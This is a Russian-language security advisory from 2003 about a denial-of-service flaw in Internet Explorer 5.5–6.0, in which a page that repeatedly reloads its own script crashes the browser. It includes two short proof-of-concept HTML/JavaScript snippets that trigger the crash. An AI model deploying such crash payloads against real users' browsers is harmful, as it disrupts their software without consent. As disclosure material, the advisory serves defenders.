DoS портив Microsoft Internet explorer
| Дата публикации: | 09.07.2003 |
| Всего просмотров: | 1256 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость в обработке исключительных ситуаций обнаружена в Microsoft Internet explorer. Удаленный пользователь может аварийно завершить работу программы.
Следующий пример приведет к аварийному завершению работы программы:
--------------------[Crash.html]--------------------
window.moveTo(screen.width,screen.height);
document.all.tags("script")[0].src="Crash.html";
//<script src="Crash.html"></script>
-----------------[End of Crash.html]---------------
На результат влияют множество факторов – количество запущенных копий Internet explorer и символов в документе.
Например, если открыто только одно окно Internet explorer, то можно использовать следующий код, чтобы точно зафиксировать время аварии:
--------------------[Demo.html]--------------------
if(!window.counter)
{
window.counter=1;
alert("Internet Explorer will be crashed after 3-5 cycle");
}
window.counter++;
alert(window.counter);
document.all.tags("script")[0].src="demo.html";
//<script src="demo.html"></script>
-----------------[End of Demo.html]----------------
Работа IE аварийно завершится на 3-5 цикле программы.
Уязвимость обнаружена в Microsoft Internet explorer 5.5-6.0 |
| Ссылки: | Internet Explorer Crash |